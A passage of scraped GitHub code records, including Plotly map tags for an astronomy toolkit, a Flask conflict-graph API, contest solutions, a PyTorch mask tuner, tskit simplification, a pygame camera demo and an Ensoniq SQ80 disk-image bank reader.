targets_no_status.filter(type=Target.SIDEREAL).values_list('ra', 'dec', 'name')\n locations_terminal = targets_terminal.filter(type=Target.SIDEREAL).values_list('ra', 'dec', 'name')\n locations_non_terminal = targets_non_terminal.filter(type=Target.SIDEREAL).values_list('ra', 'dec', 'name')\n\n data = [\n dict(\n lon=[location[0] for location in locations_no_status],\n lat=[location[1] for location in locations_no_status],\n text=[location[2] for location in locations_no_status],\n hoverinfo='lon+lat+text',\n mode='markers',\n marker=dict(color='rgba(90, 90, 90, .8)'),\n type='scattergeo'\n ),\n dict(\n lon=[location[0] for location in locations_non_terminal],\n lat=[location[1] for location in locations_non_terminal],\n text=[location[2] for location in locations_non_terminal],\n hoverinfo='lon+lat+text',\n mode='markers',\n marker=dict(color='rgba(152, 0, 0, .8)'),\n type='scattergeo'\n ),\n dict(\n lon=[location[0] for location in locations_terminal],\n lat=[location[1] for location in locations_terminal],\n text=[location[2] for location in locations_terminal],\n hoverinfo='lon+lat+text',\n mode='markers',\n marker=dict(color='rgba(0, 152, 0, .8)'),\n type='scattergeo'\n ),\n dict(\n lon=list(range(0, 360, 60))+[180]*4,\n lat=[0]*6+[-60, -30, 30, 60],\n text=list(range(0, 360, 60))+[-60, -30, 30, 60],\n hoverinfo='none',\n mode='text',\n type='scattergeo'\n )\n ]\n layout = {\n 'title': 'Observation Distribution (sidereal)',\n 'hovermode': 'closest',\n 'showlegend': False,\n 'geo': {\n 'projection': {\n 'type': 'mollweide',\n },\n 'showcoastlines': False,\n 'showland': False,\n 'lonaxis': {\n 'showgrid': True,\n 'range': [0, 360],\n },\n 'lataxis': {\n 'showgrid': True,\n 'range': [-90, 90],\n },\n }\n }\n figure = offline.plot(go.Figure(data=data, layout=layout), output_type='div', show_link=False)\n return {'figure': figure}\n\n\n@register.inclusion_tag('tom_observations/partials/facility_status.html')\ndef facility_status():\n \"\"\"\n Collect the facility status from the registered facilities and pass them\n to the facility_status.html partial template.\n See lco.py Facility implementation for example.\n :return:\n \"\"\"\n\n facility_statuses = []\n for facility_class in get_service_classes().values():\n facility = facility_class()\n weather_urls = facility.get_facility_weather_urls()\n status = facility.get_facility_status()\n\n # add the weather_url to the site dictionary\n for site in status.get('sites', []):\n url = next((site_url['weather_url'] for site_url in weather_urls.get('sites', [])\n if site_url['code'] == site['code']), None)\n if url is not None:\n site['weather_url'] = url\n\n facility_statuses.append(status)\n\n return {'facilities': facility_statuses}\n\n\n@register.inclusion_tag('tom_observations/partials/facility_map.html')\ndef facility_map():\n facility_locations = []\n for facility_class in get_service_classes().values():\n facility = facility_class()\n sites = facility.get_observing_sites()\n\n # Flatten each facility site dictionary and add text label for use in facility map\n # Resulting list is of the format [['LCO', 'Siding Spring', 'coj', -31.272, 149.07, 1116], ...]\n facility_locations.extend([\n [facility.name, site_name] + [value for value in site_data.values()]\n for site_name, site_data in sites.items()\n ])\n\n data = [\n dict(\n lat=[site[3] for site in facility_locations],\n lon=[site[4] for site in facility_locations],\n text=[f'{site[0]}: {site[1]}' for site in facility_locations],\n hoverinfo='text',\n mode='markers',\n type='scattergeo'\n 
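# a single scattergeo trace holds every site, labelled 'Facility: Site'\n        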
)\n ]\n layout = {\n 'title': 'Facility Sites',\n 'hovermode': 'closest',\n 'showlegend': False,\n 'geo': {\n 'projection': {\n 'type': 'mollweide',\n },\n 'showcoastlines': False,\n 'showland': True,\n 'lonaxis': {\n 'showgrid': True,\n 'range': [0, 360],\n },\n 'lataxis': {\n 'showgrid': True,\n 'range': [-90, 90],\n },\n }\n }\n figure = offline.plot(go.Figure(data=data, layout=layout), output_type='div', show_link=False)\n return {'figure': figure}\n","repo_name":"TOMToolkit/tom_base","sub_path":"tom_observations/templatetags/observation_extras.py","file_name":"observation_extras.py","file_ext":"py","file_size_in_byte":12634,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"43"} +{"seq_id":"27414407072","text":"from collections import Counter\nimport urllib.parse\nfrom flask import Flask, jsonify, current_app, request\nfrom flask_cors import CORS\nfrom graphbrain import *\nfrom gbserver.actors import actor_info\nfrom gbserver.conflicts import conflict_topics, conflicts_by_topic\nfrom gbserver.factions import Factions\n\n\napp = Flask(__name__)\nCORS(app)\n\n\ndef topic_url(topic):\n return '/api/conflicts/topic?{}'.format(\n urllib.parse.urlencode({'topic': topic.to_str()}))\n\n\n@app.route('/api/conflicts/topics')\ndef conflicts_topics():\n hg = hgraph(current_app.config['HG'])\n table = {'type': 'table',\n 'columns': ['id', 'label', 'weight', 'url'],\n 'rows': []}\n data = {'viz_blocks': [table]}\n for topic, weight in conflict_topics(hg).most_common():\n url = topic_url(topic),\n row = {'id': topic.to_str(),\n 'label': topic.label(),\n 'weight': weight,\n 'url': url}\n table['rows'].append(row)\n return jsonify(data)\n\n\n@app.route('/api/conflicts/topic')\ndef conflicts_topic():\n topic = hedge(request.args.get('topic'))\n\n graph = {'type': 'graph',\n 'layout': 'force-directed',\n 'topic_label': topic.label(),\n 'nodes': [],\n 'links': []}\n data = {'viz_blocks': [graph]}\n actors = Counter()\n\n hg = hgraph(current_app.config['HG'])\n conflict_pairs = []\n conflicts = conflicts_by_topic(hg, topic)\n for conflict in conflicts:\n conflict_pairs.append(conflict)\n actor1, actor2 = conflict\n actors[actor1] += 1\n actors[actor2] += 1\n conflicts_data = conflicts[conflict]\n weight = len(conflicts_data)\n headlines = [conflict_data['text'] for conflict_data in conflicts_data\n if conflict_data['text'] is not None]\n other_topics = set()\n for conflict_data in conflicts_data:\n for topic in conflict_data['other_topics']:\n other_topics.add(topic)\n\n other_topics = [{'label': t.label(),\n 'url': topic_url(t)} for t in other_topics]\n\n info = {'headlines': headlines,\n 'other_topics': list(other_topics)}\n\n link = {'source': actor1.to_str(),\n 'target': actor2.to_str(),\n 'type': 'conflict',\n 'directed': True,\n 'weight': weight,\n 'label': '',\n 'info': info}\n graph['links'].append(link)\n\n factions = Factions(conflict_pairs)\n\n for actor, weight in actors.most_common():\n node = {'id': actor.to_str(),\n 'label': actor.label(),\n 'faction': 0,\n 'weight': weight,\n 'faction': factions.faction(actor),\n 'info': actor_info(hg, actor)}\n graph['nodes'].append(node)\n return jsonify(data)\n","repo_name":"graphbrain/graphbrain-server","sub_path":"gbserver/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"73375666689","text":"# 
https://codingcompetitions.withgoogle.com/kickstart/round/0000000000434d9f/0000000000434c0c\n\n#0と隣接しているセルは同時に開示される。\n\ndef graph_scanning_dict(G, s): # ここでGは頂点隣接リストの辞書表現である.\n visited_nodes = set([s])\n boundary_nodes = set([s])\n while len(boundary_nodes) > 0:\n v = boundary_nodes.pop()\n for w in G[v]: # graph_scanningと異なるのは,ここだけである.\n if w not in visited_nodes:\n visited_nodes |= set([w])\n boundary_nodes |= set([w])\n return visited_nodes\n\n\ndef number_connected_components_dict(G): # ここでもGは頂点隣接リストの辞書表現である.\n scanned_nodes = set([])\n remaining_nodes = set(G.keys()) # \n num = 0\n while len(remaining_nodes) > 0:\n v = remaining_nodes.pop()\n num += 1\n visited_nodes = set(graph_scanning_dict(G, v))\n scanned_nodes |= visited_nodes\n remaining_nodes -= visited_nodes\n return num\n\n\n\n\n\nT = int(input())\n\nfor t in range(T):\n N = int(input())\n\n arr = []\n for i in range(N):\n arr.append(list(map(str, input())))\n\n #print(arr)\n #地雷が埋まっているマスと幾つ隣接しているかのリスト\n #地雷があるところは*を挿入しておく\n G = {}\n revealed = [[0] * N for i in range(N)]\n '''\n 注意:2次元配列を生成するとき、リスト内包表記にしないと代入がうまくいかなくなる\n [[0] * N] * Nだとうまくいかない\n 参考: https://qiita.com/oyoshi0022/items/7475951f465d20ad4970\n '''\n for i in range(N):\n for j in range(N): \n if arr[i][j] == \"*\":\n revealed[i][j] = -1\n else:\n G[(i, j)] = []\n\n \n\n # print(arr)\n\n \n \n\n # 地雷が埋まってるマスに関しては隣接リストを作らなくて良い\n for i in range(N):\n for j in range(N):\n if revealed[i][j] == -1:\n if j < N - 1:\n if arr[i][j + 1] == \".\":\n G[(i, j + 1)].append((i, j))\n if i < N - 1 and arr[i + 1][j + 1] == \".\": #一番下じゃない\n G[(i + 1, j + 1)].append((i, j))\n if i < N - 1 and arr[i + 1][j] == \".\":\n G[(i + 1, j)].append((i, j))\n if j > 0 and i < N - 1 and arr[i + 1][j - 1] == \".\":\n G[(i + 1, j - 1)].append((i, j))\n else: # 右端の場合\n if i < N - 1 and arr[i + 1][j] == \".\":\n G[(i + 1, j)].append((i, j))\n if i < N - 1 and arr[i + 1][j - 1] == \".\":\n G[(i + 1, j - 1)].append((i, j))\n else:\n # 左端のマスなら右、下、斜め右下、右端なら下、斜め左下\n if j < N - 1: #右端じゃない場合\n if arr[i][j + 1] == \"*\": \n G[(i, j)].append((i, j + 1))\n if i < N - 1 and arr[i + 1][j + 1] == \"*\": #一番下じゃない&右斜め下\n G[(i, j)].append((i + 1, j + 1))\n if i < N - 1 and arr[i + 1][j] == \"*\": # 一番下じゃない\n G[(i, j)].append((i + 1, j))\n if j > 0 and i < N - 1 and arr[i + 1][j - 1] == \"*\":\n G[(i, j)].append((i + 1, j - 1))\n else: # 右端の場合\n if i < N - 1 and arr[i + 1][j] == \"*\":\n G[(i, j)].append((i + 1, j))\n if i < N - 1 and arr[i + 1][j - 1] == \"*\":\n G[(i, j)].append((i + 1, j - 1))\n\n\n \n \n for i in range(N):\n for j in range(N):\n if revealed[i][j] > -1:\n revealed[i][j] = len(G[(i , j)])\n\n R = {}\n\n for i in range(N):\n for j in range(N): \n if revealed[i][j] > -1:\n R[(i, j)] = []\n \n # print(revealed)\n for i in range(N):\n for j in range(N):\n if revealed[i][j] > 0:\n if len(R[(i, j)]) > 0:\n continue\n if j < N - 1 and revealed[i][j + 1] == 0 and len(R[(i, j)]) < 1: # 右\n R[(i, j)].append((i, j + 1))\n R[(i, j + 1)].append((i, j))\n if i < N - 1 and revealed[i + 1][j] == 0 and len(R[(i, j)]) < 1: #下\n R[(i, j)].append((i + 1, j))\n R[(i + 1, j)].append((i, j))\n if j > 0 and i < N - 1 and revealed[i + 1][j - 1] == 0 and len(R[(i, j)]) < 1:\n R[(i, j)].append((i + 1, j - 1))\n R[(i + 1, j - 1)].append((i, j))\n if j < N - 1 and i < N - 1 and revealed[i + 1][j + 1] == 0 and len(R[(i, j)]) < 1:\n R[(i, j)].append((i + 1, j + 1))\n R[(i + 1, j + 1)].append((i, j))\n elif revealed[i][j] == 0:\n if j < N - 1 and revealed[i][j + 1] == 0: # 右\n R[(i, j)].append((i, j + 1))\n R[(i, j + 
1)].append((i, j))\n if i < N - 1 and revealed[i + 1][j] == 0: #下\n R[(i, j)].append((i + 1, j))\n R[(i + 1, j)].append((i, j))\n if j > 0 and i < N - 1 and revealed[i + 1][j - 1] == 0: #左下\n R[(i, j)].append((i + 1, j - 1))\n R[(i + 1, j - 1)].append((i, j))\n if j < N - 1 and i < N - 1 and revealed[i + 1][j + 1] == 0: #右下\n R[(i, j)].append((i + 1, j + 1))\n R[(i + 1, j + 1)].append((i, j))\n if j < N - 1 and revealed[i][j + 1] > 0 and len(R[(i, j + 1)]) < 1: # 右\n R[(i, j)].append((i, j + 1))\n R[(i, j + 1)].append((i, j))\n if i < N - 1 and revealed[i + 1][j] > 0 and len(R[(i + 1, j)]) < 1: #下\n R[(i, j)].append((i + 1, j))\n R[(i + 1, j)].append((i, j))\n if j > 0 and i < N - 1 and revealed[i + 1][j - 1] > 0 and len(R[(i + 1, j - 1)]) < 1: #左下\n R[(i, j)].append((i + 1, j - 1))\n R[(i + 1, j - 1)].append((i, j))\n if j < N - 1 and i < N - 1 and revealed[i + 1][j + 1] > 0 and len(R[(i + 1, j + 1)]) < 1: #右下\n R[(i, j)].append((i + 1, j + 1))\n R[(i + 1, j + 1)].append((i, j))\n print(f'Case #{t + 1}:', number_connected_components_dict(R))\n\n\n\n\n \n \n \n'''\n例外パターン\n001*\n0011\n1100\n*100\n\n0同時が斜めで隣り合う時はつなげない\n\n\n'''\n\n \n\n\n \n \n \n\n'''\n02*20\n13*31\n2*32*\n3*311\n2*200\n\n*..*211**1\n1112*22221\n00012*1111\n00001111*1\n0000000111\n'''","repo_name":"arie0703/coding_practice","sub_path":"questions/g_kickstart/minesweeper.py","file_name":"minesweeper.py","file_ext":"py","file_size_in_byte":6922,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"70876189571","text":"from torch import nn\nfrom copy import deepcopy\n\n\nclass MaskTuner(nn.Module):\n \"\"\"A wrapper that adds several additional convolutional layers.\n The main model remains frozen and is not trained.\n \"\"\"\n def __init__(self, model):\n \"\"\"Initializes MaskTuner.\n Parameters\n ----------\n model : torch.nn.Module\n The model that the mask tuner wraps.\n \"\"\"\n super().__init__()\n self.model = deepcopy(model)\n for param in self.model.parameters():\n param.requires_grad = False\n\n self.conv1 = nn.Conv2d(1, 64, kernel_size=7)\n self.conv2 = nn.Conv2d(64, 128, kernel_size=5)\n self.deconv1 = nn.ConvTranspose2d(128, 64, kernel_size=5)\n self.deconv2 = nn.ConvTranspose2d(64, 1, kernel_size=7)\n\n def forward(self, x):\n x = self.model(x)\n y = self.conv1(x)\n y = self.conv2(y)\n y = self.deconv1(y)\n y = self.deconv2(y)\n y = x + y\n return y\n","repo_name":"bumchik2/HumanSegmentation","sub_path":"post_processing/mask_tuner.py","file_name":"mask_tuner.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40589655847","text":"import os, sys\nimport tskit\nimport numpy as np\nimport msprime\nimport pyslim\n\nfrom tqdm import tqdm\n\nSLIM_TS = '/scratch/gbisshop/bs'\n\nNE = 10000\nMU = 2.5e-6\nREC = 1.25e-8\nS = -0.0025\nL = 1e6\nDELTA_POS = 1E3\n\n\ndef simplify_keeping_unary_in_coal(ts, map_nodes=False):\n \"\"\"\n Keep the unary regions of nodes that are coalescent at least someone in the tree seq\n Temporary hack until https://github.com/tskit-dev/tskit/issues/2127 is addressed\n \"\"\"\n tables = ts.dump_tables()\n # remove existing individuals. 
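The MaskTuner record above illustrates a common fine-tuning pattern: deep-copy a trained model, freeze all of its parameters, and train only a small residual head stacked on its output. A hedged sketch of the same idea follows; `ToyModel` is an invented stand-in for the pretrained network so the snippet runs standalone (assumes torch is installed).

```python
# Sketch of the freeze-the-backbone / train-a-residual-head pattern.
import torch
from torch import nn
from copy import deepcopy

class ToyModel(nn.Module):
    """Stand-in for any pretrained single-channel image model."""
    def __init__(self):
        super().__init__()
        self.conv = nn.Conv2d(1, 1, kernel_size=3, padding=1)

    def forward(self, x):
        return self.conv(x)

class ResidualTuner(nn.Module):
    def __init__(self, model):
        super().__init__()
        self.model = deepcopy(model)
        for param in self.model.parameters():
            param.requires_grad = False  # backbone stays frozen
        # Small trainable refinement head, in the spirit of the record above.
        self.head = nn.Sequential(
            nn.Conv2d(1, 8, kernel_size=3, padding=1),
            nn.ConvTranspose2d(8, 1, kernel_size=3, padding=1),
        )

    def forward(self, x):
        x = self.model(x)
        return x + self.head(x)  # residual correction on top of frozen output

tuner = ResidualTuner(ToyModel())
out = tuner(torch.randn(1, 1, 16, 16))
print(out.shape)  # torch.Size([1, 1, 16, 16]); only the head is trainable
```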
We will reinstate them later\n tables.individuals.clear()\n tables.individuals.metadata_schema = tskit.MetadataSchema.permissive_json()\n tables.nodes.individual = np.full_like(tables.nodes.individual, tskit.NULL)\n\n _, node_map = ts.simplify(map_nodes=True)\n keep_nodes = np.where(node_map != tskit.NULL)[0]\n # Add an individual for each coalescent node, so we can run\n # simplify(keep_unary_in_individuals=True) to leave the unary portions in.\n for u in keep_nodes:\n i = tables.individuals.add_row()\n tables.nodes[u] = tables.nodes[u].replace(individual=i)\n node_map = tables.simplify(keep_unary_in_individuals=True, filter_individuals=False)\n\n # Reinstate individuals\n tables.individuals.clear()\n for i in ts.individuals():\n tables.individuals.append(i)\n val, inverted_map = np.unique(node_map, return_index=True)\n inverted_map = inverted_map[val != tskit.NULL]\n tables.nodes.individual = ts.tables.nodes.individual[inverted_map]\n if map_nodes:\n return tables.tree_sequence(), node_map\n else:\n return tables.tree_sequence()\n\n\ndef main():\n rng = np.random.default_rng(101)\n random_seed = rng.integers(0, 2**16)\n ts = tskit.load(os.path.join(SLIM_TS, 'bs.co.false.trees'))\n random_samples = rng.choice(np.arange(20000), replace=False, size=200)\n \n tss = ts.simplify(random_samples, keep_unary=True)\n cotss = simplify_keeping_unary_in_coal(tss)\n cotss.dump(os.path.join(SLIM_TS, 'bs.co.false.subsample.trees'))\n\n height_for_pos = np.zeros(int(cotss.sequence_length))\n for tree in cotss.trees():\n mean_height = np.mean([tree.time(root) for root in tree.roots])\n left, right = map(int, tree.interval)\n height_for_pos[left: right] = mean_height\n height_for_pos.dump('tree_height_bs.npy')\n\n\nif __name__ == '__main__':\n main()","repo_name":"GertjanBisschop/smc-bit-paper","sub_path":"workflow/slim_to_lik.py","file_name":"slim_to_lik.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"28726435738","text":"from sys import exit, stdin, setrecursionlimit\r\nfrom bisect import bisect_left, bisect_right, insort_left, insort_right\r\nfrom collections import defaultdict, deque\r\nfrom heapq import heappop, heappush, heapify\r\nfrom itertools import permutations, combinations, accumulate\r\nfrom math import sqrt\r\nINF = 10**15\r\nMOD = 10**9+7\r\n\r\nL, R = map(int, input().split())\r\n\r\nans = 0\r\nl_keta = len(str(L))\r\nr_leta = len(str(R))\r\n\r\ni = l_keta\r\nnow = L\r\n\r\n#初項a、末項l、項数n\r\ndef S1(a, l, n):\r\n return n*(a+l)//2\r\n\r\n#初項a、公差d、項数n\r\ndef S2(a, d, n):\r\n return n*(2*a + (n-1)*d)//2\r\n\r\nwhile 1:\r\n if pow(10, i) > R:\r\n ans += i * S1(now, R, R-now+1)\r\n break\r\n ans += i * S1(now, pow(10, i)-1, pow(10, i)-now)\r\n now = pow(10, i)\r\n i += 1\r\n ans %= MOD\r\nprint(ans%MOD)\r\n\r\n","repo_name":"susami-jpg/AtCoder","sub_path":"競プロ典型90問/082.py","file_name":"082.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"8865716391","text":"import pygame\nfrom sys import exit\n\n\"\"\"\nA functional/visual representation of the RelativeCamera template found in the functions.py file.\nThis code will initiate a matrix with coordinates relative to a given position in said matrix.\nAllows the 'camera' in a game to follow and stay centered on the player character.\n\nHow to use:\n\"Player character\" is represented by a small green line. 
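The short competitive-programming record above (typical-90 problem 082) leans on two arithmetic-series identities: the sum from first term, last term, and count, and the sum from first term, common difference, and count. A quick sketch cross-checking both closed forms against a brute-force sum:

```python
# Cross-check of the two arithmetic-series helpers used in the record above.
def S1(a, l, n):  # first term a, last term l, n terms
    return n * (a + l) // 2

def S2(a, d, n):  # first term a, common difference d, n terms
    return n * (2 * a + (n - 1) * d) // 2

a, d, n = 5, 3, 10
terms = [a + i * d for i in range(n)]
assert S1(a, terms[-1], n) == sum(terms) == S2(a, d, n)
print(sum(terms))  # 185
```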
Control using arrow keys.\nControl level of zoom with numerical keys 1 and 2.\n\nRed lines are drawn from each node in matrix to center/character, to better illustrate what is happening.\n\nHere is a list of settings that can be changed and what they do:\n matrix_w: Width of the matrix. Controls the size of the \"game world\".\n matrix_h: Height of the matrix. Controls the size of the \"game world\".\n board_width: Width of the game window\n board_height: Height of the game window\n sprite_size: Essentially controls the level of zoom.\n char_pos: Position of the \"player character\" in the matrix. Default is set to center of the matrix\n\"\"\"\n\n# Create matrix\nmatrix_one = []\nmatrix_w = 20\nmatrix_h = 20\nfor _ in range(matrix_h):\n matrix_one.append([None] * matrix_w)\n\n# Board/screen information\nboard_width = 1280\nboard_height = 720\nsprite_size = 25\nmatrix_center_pos = matrix_h / 2, matrix_w / 2\nchar_pos = matrix_center_pos\n\n# Pygame setup\npygame.init()\nscreen = pygame.display.set_mode((board_width, board_height))\nclock = pygame.time.Clock()\nframe_rate = 60\n\ndef offset_center(position):\n \"\"\"Offsets coordinates of everything in a matrix relative to a given position\"\"\"\n h, w = position\n start_h = (board_height / 2) - (sprite_size*h)\n start_w = (board_width / 2) - (sprite_size*w)\n reset_w = start_w\n for i_row, row in enumerate(matrix_one):\n for i_num, num in enumerate(row):\n matrix_one[i_row][i_num] = [start_w, start_h]\n start_w += sprite_size\n start_h += sprite_size\n start_w = reset_w\n #matrix_one[h][w] = \"Character\"\n\n# Build matrix\noffset_center(char_pos)\n#print(matrix_one)\n\n# Game loop\nwhile True:\n # Erase screen each loop\n screen.fill((0, 0, 0))\n \n # Listen for input (keyboard, mouse etc)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n if event.type == pygame.KEYDOWN:\n # Movement\n if event.key == pygame.K_LEFT:\n char_pos = char_pos[0], char_pos[1] - 1\n offset_center(char_pos)\n elif event.key == pygame.K_RIGHT:\n char_pos = char_pos[0], char_pos[1] + 1\n offset_center(char_pos)\n elif event.key == pygame.K_DOWN:\n char_pos = char_pos[0] + 1, char_pos[1]\n offset_center(char_pos)\n elif event.key == pygame.K_UP:\n char_pos = char_pos[0] - 1, char_pos[1]\n offset_center(char_pos)\n # Zoom\n elif event.key == pygame.K_1:\n if sprite_size > 10:\n sprite_size -= 10\n offset_center(char_pos)\n elif event.key == pygame.K_2:\n if sprite_size < 50:\n sprite_size += 10\n offset_center(char_pos)\n #print(matrix_one)\n\n # Draw matrix grid\n line_colour = (255, 0, 0) # Max 255, min 0\n for rows in matrix_one:\n for col in rows:\n xy = (0, 0) if not col else col\n pygame.draw.line(surface=screen,\n color=line_colour,\n start_pos=xy,\n end_pos=(board_width / 2, board_height / 2),\n width=2)\n\n # Draw crosshair at center of screen\n line_colour = (0, 255, 0)\n pygame.draw.line(surface=screen,\n color=line_colour,\n start_pos=((board_width / 2) - 6, board_height / 2),\n end_pos=((board_width / 2) + 7, board_height / 2),\n width=2)\n pygame.draw.line(surface=screen,\n color=line_colour,\n start_pos=((board_width / 2), (board_height / 2) - 6),\n end_pos=((board_width / 2), (board_height / 2) + 7),\n width=2)\n \n\n # Pygame updates\n pygame.display.update()\n 
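The `offset_center` routine above boils down to a pure coordinate transform: a cell's screen position is the screen centre plus (cell index minus the followed cell's index) times the sprite size. A dependency-free sketch (no pygame required) with a quick check that the followed cell always lands on the screen centre:

```python
# Pure version of the relative-camera transform from the record above.
def cell_to_screen(cell, char_pos, sprite_size, board_w, board_h):
    """Map a (row, col) grid cell to pixel coords, keeping char_pos centred."""
    row, col = cell
    char_row, char_col = char_pos
    x = board_w / 2 + (col - char_col) * sprite_size
    y = board_h / 2 + (row - char_row) * sprite_size
    return x, y

# The followed cell maps exactly to the screen centre...
assert cell_to_screen((10, 10), (10, 10), 25, 1280, 720) == (640.0, 360.0)
# ...and its right-hand neighbour sits one sprite-width to the right.
assert cell_to_screen((10, 11), (10, 10), 25, 1280, 720) == (665.0, 360.0)
```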
clock.tick(frame_rate)\n","repo_name":"Langeball/CV","sub_path":"RelativeCamera2D.py","file_name":"RelativeCamera2D.py","file_ext":"py","file_size_in_byte":4365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"17067362422","text":"import argparse\nimport re\n\n#--------------------\n# globals\n#--------------------\n\nFILE_TYPES=['---','SYS','BNK','SNG','SEQ','SYX','PRG']\nINIT_PROG=bytes([0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7e, 0x7e, 0x7e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x7e, 0x7e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x7e, 0x7e, 0x0, 0x0, 0x0, 0x0, 0x2, 0x0, 0x0, 0x7e, 0x7e, 0x7e, 0x0, 0x0, 0x0, 0x0, 0x2, 0x0, 0x0, 0x16, 0xff, 0xff, 0x80, 0x16, 0xff, 0xff, 0x80, 0x16, 0xff, 0xff, 0x80, 0x24, 0x0, 0xff, 0x0, 0x0, 0x0, 0x68, 0xff, 0x7e, 0x0, 0x24, 0x0, 0xff, 0x0, 0x0, 0x0, 0x68, 0xff, 0x7e, 0x0, 0x24, 0x0, 0xff, 0x0, 0x0, 0x0, 0x68, 0xff, 0x7e, 0x0, 0x7e, 0x7f, 0x0, 0xff, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x71, 0x27, 0x27, 0x8f, 0x0]) \n\n#--------------------\n# classes\n#--------------------\n\nclass directory:\n \"\"\" \n object representation of the disk directory \n \"\"\"\n def __init__(self,buf): \n \"\"\" buf is a bytearray containing the disk directory data \"\"\"\n assert(len(buf)==2048)\n self.buf=buf\n \n def banks(self):\n \"\"\" return the bank entries in the directory as a list of bank file_names. None for not defined \"\"\"\n \n banks=[]\n for i in range(0,40):\n dir_entry=self.buf[(i+10)*13:(i+10+1)*13]\n (file_type,file_name,file_size)=(FILE_TYPES[dir_entry[0]],sqbytes_to_ascii(dir_entry[1:11]),int.from_bytes(dir_entry[11:13],'big'))\n # file_size is not used\n\n if file_type=='---':\n banks.append(None)\n else:\n assert file_type == 'BNK'\n banks.append(file_name)\n\n return banks\n \n def progs(self):\n \"\"\" return the prog entries in the directory of prog names. None for not defined \"\"\"\n\n progs=[]\n\n for i in range (0,128):\n prog_name_raw=self.buf[650+i*6:650+(i+1)*6]\n if prog_name_raw[0]==0: # if you skip this check, you can recover\n # deleted programs. only the first char is\n # changed in the directory\n progs.append(None)\n else:\n progs.append(prog_name_raw)\n \n return progs\n\n\n#--------------------\n# functions\n#--------------------\n\ndef chs_to_offset(c,h,s):\n \"\"\"\n convert cylinder, head, sector numbers to a byte offset into a disk dump file\n \"\"\"\n\n\n assert(c>=0 and c<80)\n assert(h>=0 and h<2)\n assert(s>=0 and h<6)\n\n offset = 10 # file header\n offset += (c*2+h)*(5*1024+512)\n offset += s*1024\n\n #print(\"c:{},h:{},s:{} = {}\".format(c,h,s,offset))\n\n return offset\n\ndef prog_to_chs(prog):\n \"\"\"\n convert individual program number (counting from 0) to a c,h,s address.\n \n algorithm taken from sq80toolkit.dvi. One of the overridden sector\n locations was fixed, and two were added (as indicated). The proper values were\n determined by manual inspection of an actual disk image. 
Without these fixes,\n bad data was being read back for those 3 individual program locations.\n\n \"\"\"\n prog=prog\n sw=(prog & 64)|((prog & 63)+2)\n #print (\"prog_to_chs: prog={}, sw={}\".format(prog,sw))\n\n if sw == 0x06:\n c = 0x42\n h = 0 \n elif sw == 0x19:\n c = 0x42\n h = 1\n elif sw == 0x1f: \n c = 0x43\n h = 0 # sq80toolkit has this as 1\n elif sw == 0x26: # sq80toolit doesn't include this case\n c = 0x43\n h = 1\n elif sw == 0x39:\n c = 0x44\n h = 0\n elif sw == 0x3f:\n c = 0x44\n h = 1\n elif sw == 0x4c: # sq80toolkit doesn't include this case\n c = 0x45\n h = 0\n elif sw == 0x53:\n c = 0x45\n h = 1\n elif sw == 0x6c:\n c = 0x46\n h = 0\n elif sw == 0x73:\n c = 0x46\n h = 1\n else: \n c = (prog & 63)+2\n h = (prog & 64)>>6\n s = 5\n #print(\"c,h,s:{}.{}.{}\".format(c,h,s))\n return(c,h,s)\n\n\ndef sqbytes_to_ascii(b):\n \"\"\"\n convert Ensoniq charset to ASCII\n\n The mapping is taken verbatim from sq80toolkit sq80dir.c.\n \"\"\"\n\n s=\"\"\n maps={ \n 0x00:0x2d,\n 0x21:0x30,\n 0x23:0x31,\n 0x25:0x32,\n 0x28:0x33,\n 0x29:0x34,\n 0x3a:0x35,\n 0x3b:0x36,\n 0x5b:0x37,\n 0x5c:0x38,\n 0x5d:0x39\n }\n\n for c in b:\n\n if c in maps:\n s+=str(chr(maps[c]))\n elif c<32 or c>=127: # non printable characters, this is likely from a corrupt image\n raise RuntimeError(\"Invalid character in string. Likely a corrupt disk.\")\n #s+=str(\"\\\\\"+str(c))\n else:\n s+=str(chr(c))\n\n return s\n\ndef read_bank(bank):\n \"\"\"\n read bank from the image file and return as binary\n \"\"\"\n assert(bank>=0 and bank<40)\n\n sector_offset = (bank%20)*4\n c = 64+int(sector_offset/5)\n h = int(bank/20)\n s = sector_offset%5\n\n data_in=bytearray()\n\n for i in range(0,4):\n args.imagefile.seek(chs_to_offset(c,h,s));\n\n if i!=3:\n data_in+=args.imagefile.read(1024)\n else:\n data_in+=args.imagefile.read(1008)\n\n if s==4:\n s=0\n c+=1\n else:\n s+=1\n\n return data_in\n\ndef dump_bank(bank_data,dump_file): \n \"\"\"\n dump the bank binary data in bank_data to dump_file\n \"\"\"\n\n if args.dump=='syx':\n\n data_out=bytearray(b'\\xf0\\x0f\\x02\\x00') # SQ80 SYS EX HEADER / CH0\n data_out+=b'\\x02' # all program dump\n\n for b in bank_data:\n data_out+=bytes([b&0x0f, b>>4])\n\n data_out+=b'\\xf7' # end of exclusive\n\n else:\n data_out=bank_data\n\n with open(dump_file,\"bx\") as outfile:\n outfile.write(data_out)\n\ndef read_prog(prog_num):\n \"\"\"\n read in individual program and return as binary\n \"\"\"\n assert(prog_num >= 0 and prog_num < 128)\n (c,h,s)=prog_to_chs(prog_num)\n \n args.imagefile.seek(chs_to_offset(c,h,s))\n\n program_data=args.imagefile.read(102) \n\n if (directory.progs()[prog_num] != program_data[0:6]):\n raise RuntimeError(\"program name on disk ({}) doesn't match directory entry 